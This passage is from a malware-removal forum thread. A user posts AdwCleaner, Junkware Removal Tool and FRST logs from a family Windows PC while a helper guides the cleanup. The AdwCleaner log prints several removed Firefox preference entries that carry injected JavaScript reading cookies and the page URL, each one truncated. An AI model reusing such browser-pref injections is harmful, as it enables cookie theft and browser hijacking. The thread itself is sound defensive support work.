Line Deleted : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Deleted : user_pref("extensions.lg_GIGj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo[...]
Line Deleted : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\prefs.js ]


[ File : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\prefs.js ]

Line Deleted : user_pref("CT3074349..clientLogIsEnabled", true);
Line Deleted : user_pref("CT3074349..clientLogServiceUrl", "hxxp://clientlog.users.conduit.com/ClientDiagnostics.asmx/ReportDiagnosticsEvent");
Line Deleted : user_pref("CT3074349..uninstallLogServiceUrl", "hxxp://uninstall.users.conduit.com/Uninstall.asmx/RegisterToolbarUninstallation");
Line Deleted : user_pref("CT3074349.AboutPrivacyUrl", "hxxp://www.conduit.com/privacy/Default.aspx");
Line Deleted : user_pref("CT3074349.CTID", "CT3074349");
Line Deleted : user_pref("CT3074349.CurrentServerDate", "16-9-2011");
Line Deleted : user_pref("CT3074349.DialogsAlignMode", "LTR");
Line Deleted : user_pref("CT3074349.DialogsGetterLastCheckTime", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.DownloadReferralCookieData", "");
Line Deleted : user_pref("CT3074349.FirstServerDate", "15-9-2011");
Line Deleted : user_pref("CT3074349.FirstTime", true);
Line Deleted : user_pref("CT3074349.FirstTimeFF3", true);
Line Deleted : user_pref("CT3074349.FixPageNotFoundErrors", true);
Line Deleted : user_pref("CT3074349.GroupingServerCheckInterval", 1440);
Line Deleted : user_pref("CT3074349.GroupingServiceUrl", "hxxp://grouping.services.conduit.com/");
Line Deleted : user_pref("CT3074349.HasUserGlobalKeys", true);
Line Deleted : user_pref("CT3074349.Initialize", true);
Line Deleted : user_pref("CT3074349.InitializeCommonPrefs", true);
Line Deleted : user_pref("CT3074349.InstallationAndCookieDataSentCount", 2);
Line Deleted : user_pref("CT3074349.InstallationType", "UnknownIntegration");
Line Deleted : user_pref("CT3074349.InstalledDate", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.InvalidateCache", false);
Line Deleted : user_pref("CT3074349.IsGrouping", false);
Line Deleted : user_pref("CT3074349.IsInitSetupIni", true);
Line Deleted : user_pref("CT3074349.IsMulticommunity", false);
Line Deleted : user_pref("CT3074349.IsOpenThankYouPage", false);
Line Deleted : user_pref("CT3074349.IsOpenUninstallPage", true);
Line Deleted : user_pref("CT3074349.LanguagePackLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.LanguagePackReloadIntervalMM", 1440);
Line Deleted : user_pref("CT3074349.LanguagePackServiceUrl", "hxxp://translation.users.conduit.com/Translation.ashx");
Line Deleted : user_pref("CT3074349.LastLogin_3.6.0.10", "Thu Sep 15 2011 20:24:45 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.LatestVersion", "3.6.0.10");
Line Deleted : user_pref("CT3074349.Locale", "en");
Line Deleted : user_pref("CT3074349.MCDetectTooltipHeight", "83");
Line Deleted : user_pref("CT3074349.MCDetectTooltipUrl", "hxxp://@EB_INSTALL_LINK@/rank/tooltip/?version=1");
Line Deleted : user_pref("CT3074349.MCDetectTooltipWidth", "295");
Line Deleted : user_pref("CT3074349.MyStuffEnabledAtInstallation", true);
Line Deleted : user_pref("CT3074349.OriginalFirstVersion", "3.6.0.10");
Line Deleted : user_pref("CT3074349.RadioIsPodcast", false);
Line Deleted : user_pref("CT3074349.RadioLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.RadioLastUpdateIPServer", "3");
Line Deleted : user_pref("CT3074349.RadioLastUpdateServer", "3");
Line Deleted : user_pref("CT3074349.RadioMediaID", "9962");
Line Deleted : user_pref("CT3074349.RadioMediaType", "Media Player");
Line Deleted : user_pref("CT3074349.RadioMenuSelectedID", "EBRadioMenu_CT30743499962");
Line Deleted : user_pref("CT3074349.RadioShrinkedFromSetup", false);
Line Deleted : user_pref("CT3074349.RadioStationName", "California%20Rock");
Line Deleted : user_pref("CT3074349.RadioStationURL", "hxxp://feedlive.net/california.asx");
Line Deleted : user_pref("CT3074349.SavedHomepage", "about:blank");
Line Deleted : user_pref("CT3074349.SearchFromAddressBarIsInit", true);
Line Deleted : user_pref("CT3074349.SearchInNewTabEnabled", true);
Line Deleted : user_pref("CT3074349.SearchInNewTabIntervalMM", 1440);
Line Deleted : user_pref("CT3074349.SearchInNewTabLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.SearchInNewTabServiceUrl", "hxxp://newtab.conduit-hosting.com/newtab/?ctid=EB_TOOLBAR_ID");
Line Deleted : user_pref("CT3074349.SearchInNewTabUsageUrl", "hxxp://Usage.Hosting.conduit-services.com/UsageService.asmx/UsersRequests?ctid=EB_TOOLBAR_ID");
Line Deleted : user_pref("CT3074349.SearchInNewTabUserEnabled", false);
Line Deleted : user_pref("CT3074349.SearchProtectorToolbarDisabled", true);
Line Deleted : user_pref("CT3074349.ServiceMapLastCheckTime", "Thu Sep 15 2011 06:32:54 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.SettingsLastCheckTime", "Thu Sep 15 2011 20:24:41 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.SettingsLastUpdate", "1314715212");
Line Deleted : user_pref("CT3074349.ThirdPartyComponentsInterval", 504);
Line Deleted : user_pref("CT3074349.ThirdPartyComponentsLastCheck", "Thu Sep 15 2011 06:32:54 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.ThirdPartyComponentsLastUpdate", "1312887586");
Line Deleted : user_pref("CT3074349.ToolbarDisabled", false);
Line Deleted : user_pref("CT3074349.ToolbarShrinkedFromSetup", false);
Line Deleted : user_pref("CT3074349.TrusteLinkUrl", "hxxp://trust.conduit.com/CT3074349");
Line Deleted : user_pref("CT3074349.TrustedApiDomains", "conduit.com,conduit-hosting.com,conduit-services.com,client.conduit-storage.com,OurToolbar.com,CommunityToolbars.com,ForumToolbar.com,MyBlogToolbar.com,MyCity[...]
Line Deleted : user_pref("CT3074349.Uninstall", true);
Line Deleted : user_pref("CT3074349.UserID", "UN72577828490742812");
Line Deleted : user_pref("CT3074349.WeatherNetwork", "");
Line Deleted : user_pref("CT3074349.WeatherPollDate", "Thu Sep 15 2011 20:24:42 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.WeatherUnit", "F");
Line Deleted : user_pref("CT3074349.alertChannelId", "1465784");
Line Deleted : user_pref("CT3074349.generalConfigFromLogin", "{\"ApiMaxAlerts\":\"12\",\"SocialDomains\":\"social.conduit.com;apps.conduit.com;services.apps.conduit.com\",\"AppsDetectionUrlPattern\":\"hxxp://appdown[...]
Line Deleted : user_pref("CT3074349.globalFirstTimeInfoLastCheckTime", "Thu Sep 15 2011 20:24:42 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.homepageProtectorEnableByLogin", true);
Line Deleted : user_pref("CT3074349.initDone", true);
Line Deleted : user_pref("CT3074349.isAppTrackingManagerOn", true);
Line Deleted : user_pref("CT3074349.isFirstRadioInstallation", false);
Line Deleted : user_pref("CT3074349.myStuffEnabled", true);
Line Deleted : user_pref("CT3074349.myStuffPublihserMinWidth", 400);
Line Deleted : user_pref("CT3074349.myStuffSearchUrl", "hxxp://Apps.conduit.com/search?q=SEARCH_TERM&SearchSourceOrigin=29&ctid=EB_TOOLBAR_ID&octid=EB_ORIGINAL_CTID");
Line Deleted : user_pref("CT3074349.myStuffServiceIntervalMM", 1440);
Line Deleted : user_pref("CT3074349.myStuffServiceUrl", "hxxp://mystuff.conduit-services.com/MyStuffService.ashx?ComponentId=EB_MY_STUFF_INSTANCE_GUID&lut=EB_MY_STUFF_LUT");
Line Deleted : user_pref("CT3074349.oldAppsList", "129446538071425236,129574421762864744,111,129574421763479940,1000082,129574421763997487,1000234,129574421764495504,129574421764505270,129574421764515036,1000034,100[...]
Line Deleted : user_pref("CT3074349.searchProtectorDialogDelayInSec", 10);
Line Deleted : user_pref("CT3074349.searchProtectorEnableByLogin", true);
Line Deleted : user_pref("CT3074349.testingCtid", "");
Line Deleted : user_pref("CT3074349.toolbarAppMetaDataLastCheckTime", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.toolbarContextMenuLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.usagesFlag", 1);
Line Deleted : user_pref("CommunityToolbar.ConduitHomepagesList", "hxxp://search.conduit.com/?ctid=CT3074349&SearchSource=13");
Line Deleted : user_pref("CommunityToolbar.ConduitSearchList", "PhotoJoy US Customized Web Search,uTorrentControl2 Customized Web Search");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://Settings.toolbar.search.conduit.com/root/CT3072253/CT3072253", "\"76b4669a117e81f713161171f6d50d821\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://alerts.conduit-services.com/root/1463702/1459356/US", "\"0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://alerts.conduit-services.com/root/1465784/1461438/US", "\"0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://appsmetadata.toolbar.conduit-services.com/?ctid=CT3072253", "\"1336063965\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://appsmetadata.toolbar.conduit-services.com/?ctid=CT3074349", "\"1312968577\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=GottenApps&locale=en", "C5ZJe6gL80JBW5CuLy+wkg==");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=OtherApps&locale=en", "2E1/v7EfCEDbv3VaBQMELg==");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=SharedApps&locale=en", "k9un27OkAvkwB2ZmvXxTnA==");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=Toolbar&locale=en", "4BgM4MhF/sOgPsDNmIs3Yw==");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.alert.conduit-services.com/alert/dlg.pkg", "\"8076e3ce381dcd1:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.toolbar.conduit-services.com/DLG.pkg?ver=3.13.0.6", "\"4ead38b3e6bcd1:145a\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.toolbar.conduit-services.com/DLG.pkg?ver=3.6.0.10", "\"80ee9485875dcc1:1192\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://servicemap.conduit-services.com/Toolbar/?ownerId=CT3072253", "\"d76323372b05c3748a3d6b1c93a98292\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://servicemap.conduit-services.com/Toolbar/?ownerId=CT3074349", "\"634515122457000000\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://settings.toolbar.conduit-services.com/?ctid=CT3074349&octid=CT3074349", "\"1314715212\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/equalizer_dead.gif", "\"03e383867bc91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/minimize.gif", "\"0e685fa27bc91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/play.gif", "\"02faea337c7c91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/stop.gif", "\"03a54d7f47ac91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/vol.gif", "\"049b47644c7c91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://translation.toolbar.conduit-services.com/?locale=en", "\"1c8884e1d7013beea7adb5fd75562429\"");
Line Deleted : user_pref("CommunityToolbar.LatestLibsPath", "file:///C:\\Users\\Nick\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\ghs5oui9.default\\conduitCommon\\modules\\3.13.0.6");
Line Deleted : user_pref("CommunityToolbar.LatestToolbarVersionInstalled", "3.13.0.6");
Line Deleted : user_pref("CommunityToolbar.SearchFromAddressBarSavedUrl", "hxxp://www.bing.com/search?pc=Z016&form=ZGAADF&q=");
Line Deleted : user_pref("CommunityToolbar.ToolbarsList", "CT3074349");
Line Deleted : user_pref("CommunityToolbar.ToolbarsList2", "CT3074349");
Line Deleted : user_pref("CommunityToolbar.ToolbarsList4", "CT3074349");
Line Deleted : user_pref("CommunityToolbar.globalUserId", "cc216d56-d7ed-4ac3-8282-651bea8138ff");
Line Deleted : user_pref("CommunityToolbar.isAlertUrlAddedToFeedItemTable", true);
Line Deleted : user_pref("CommunityToolbar.isClickActionAddedToFeedItemTable", true);
Line Deleted : user_pref("CommunityToolbar.keywordURLSelectedCTID", "CT3072253");
Line Deleted : user_pref("CommunityToolbar.notifications.alertDialogsGetterLastCheckTime", "Fri Jun 08 2012 00:17:45 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CommunityToolbar.notifications.alertEnabled", true);
Line Deleted : user_pref("CommunityToolbar.notifications.alertInfoInterval", 1440);
Line Deleted : user_pref("CommunityToolbar.notifications.alertInfoLastCheckTime", "Fri Jun 08 2012 12:36:14 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CommunityToolbar.notifications.clientsServerUrl", "hxxp://alert.client.conduit.com");
Line Deleted : user_pref("CommunityToolbar.notifications.locale", "en");
Line Deleted : user_pref("CommunityToolbar.notifications.loginIntervalMin", 1440);
Line Deleted : user_pref("CommunityToolbar.notifications.loginLastCheckTime", "Fri Jun 08 2012 00:17:44 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CommunityToolbar.notifications.loginLastUpdateTime", "1313487611");
Line Deleted : user_pref("CommunityToolbar.notifications.messageShowTimeSec", 20);
Line Deleted : user_pref("CommunityToolbar.notifications.servicesServerUrl", "hxxp://alert.services.conduit.com");
Line Deleted : user_pref("CommunityToolbar.notifications.showTrayIcon", false);
Line Deleted : user_pref("CommunityToolbar.notifications.userCloseIntervalMin", 300);
Line Deleted : user_pref("CommunityToolbar.notifications.userId", "5da594d4-182c-41cf-960d-e9dcf87f3b75");
Line Deleted : user_pref("CommunityToolbar.originalHomepage", "hxxp://www.google.com/");
Line Deleted : user_pref("CommunityToolbar.originalSearchEngine", "chrome://browser-region/locale/region.properties");
Line Deleted : user_pref("browser.search.defaultthis.engineName", "uTorrentControl2 Customized Web Search");
Line Deleted : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Deleted : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Deleted : user_pref("extensions.lg_GIGj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo[...]
Line Deleted : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

-\\ Google Chrome v35.0.1916.153

[ File : C:\Users\Bill\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Extension] : booedmolknjekdopkepjjeckmjkdpfgl
Deleted [Extension] : flpcjncodpafbgdpnkljologafpionhb

[ File : C:\Users\Dylan\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\Hannah\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3319598&octid=EB_ORIGINAL_CTID&ISID=M180E7AAF-7B0C-4944-94F1-C3AD338C4DD6&SearchSource=58&CUI=&UM=5&UP=SP9F1267DC-924A-4FA2-8BD3-B25688915483&q={searchTerms}&SSPV=

[ File : C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

*************************

AdwCleaner[R0].txt - [31099 octets] - [01/11/2014 10:55:50]
AdwCleaner[R1].txt - [31160 octets] - [01/11/2014 11:16:01]
AdwCleaner[S0].txt - [26790 octets] - [01/11/2014 11:31:44]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [26851 octets] ##########
 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.5 (10.31.2014:1)
OS: Windows Vista ™ Ultimate x86
Ran by Nick on Sat 11/01/2014 at 11:40:18.00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\Application\update rightsurf
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\Application\util rightsurf
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{626F3344-6A64-3995-E8E7-11D63F841162}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{626F3344-6A64-3995-E8E7-11D63F841162}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6D5C04CD-A77C-BAB9-6494-57DA426BB009}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{6D5C04CD-A77C-BAB9-6494-57DA426BB009}



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Users\Nick\Local Settings\Application Data\cre"
Successfully deleted: [Folder] "C:\Program Files\eusing free registry cleaner"
Successfully deleted: [Folder] "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\free registry cleaner"
Successfully deleted: [Folder] "C:\Users\Nick\AppData\Roaming\microsoft\windows\start menu\programs\free registry cleaner"



~~~ FireFox

Successfully deleted: [File] C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\ghs5oui9.default\searchplugins\bing-zugo.xml
Successfully deleted the following from C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\ghs5oui9.default\prefs.js

user_pref("extensions.searchtoolbar@zugo.com.install-event-fired", true);
Emptied folder: C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\ghs5oui9.default\minidumps [116 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 11/01/2014 at 11:45:22.75
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

 

 


#8 Jo*

Jo*

  • Malware Response Team

Posted 01 November 2014 - 02:53 PM

I need the FRST.txt from the 2nd scan with FRST.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#9 topper8281

topper8281
  • Topic Starter

  • Members

Posted 01 November 2014 - 03:03 PM

I posted it. It's just that the scan came up empty.



#10 Jo*

Jo*

  • Malware Response Team

Posted 01 November 2014 - 03:22 PM


Run FRST again from your Desktop (C:\Users\Nick\Desktop).



#11 topper8281

topper8281
  • Topic Starter

  • Members

Posted 01 November 2014 - 05:37 PM

I will as soon as I get a chance.

#12 topper8281

topper8281
  • Topic Starter

  • Members

Posted 02 November 2014 - 12:26 AM

Okay Jo. Here is the latest FRST scan result.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-11-2014
Ran by Nick (administrator) on WALKER-PC on 01-11-2014 22:24:09
Running from C:\Users\Nick\Desktop
Loaded Profile: Nick (Available profiles: Kristi & Hannah & Nick & Bill & UpdatusUser & Dylan & Administrator)
Platform: Microsoft® Windows Vista™ Ultimate  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 7
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Avast Software) C:\Program Files\Alwil Software\Avast5\ng\vbox\AvastVBoxSVC.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\avastui.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-19] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [932288 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [AdobeCS6ServiceManager] => C:\Program Files\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [5223016 2014-10-31] (AVAST Software)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-05-26] (Apple Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [googletalk] => C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Google Update] => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-04-10] (Google Inc.)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1140736 2014-05-03] (Spotify Ltd)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: G - G:\sources\sperr32.exe x64
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: {b1134796-9622-11e0-9898-0040f4e8e5d1} - F:\noautorun.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\Bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Nick\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShell.dll (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BootExecute: autocheck autochk * sdnclean.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
CHR HKCU\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/?pc=Z016&form=ZGAPHP
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com?fr=hp-avast&type=odc268
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.yahoo.com?fr=hp-avast&type=odc268
SearchScopes: HKCU - {8A64D544-98BB-C260-590A-335EB1FB0846} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
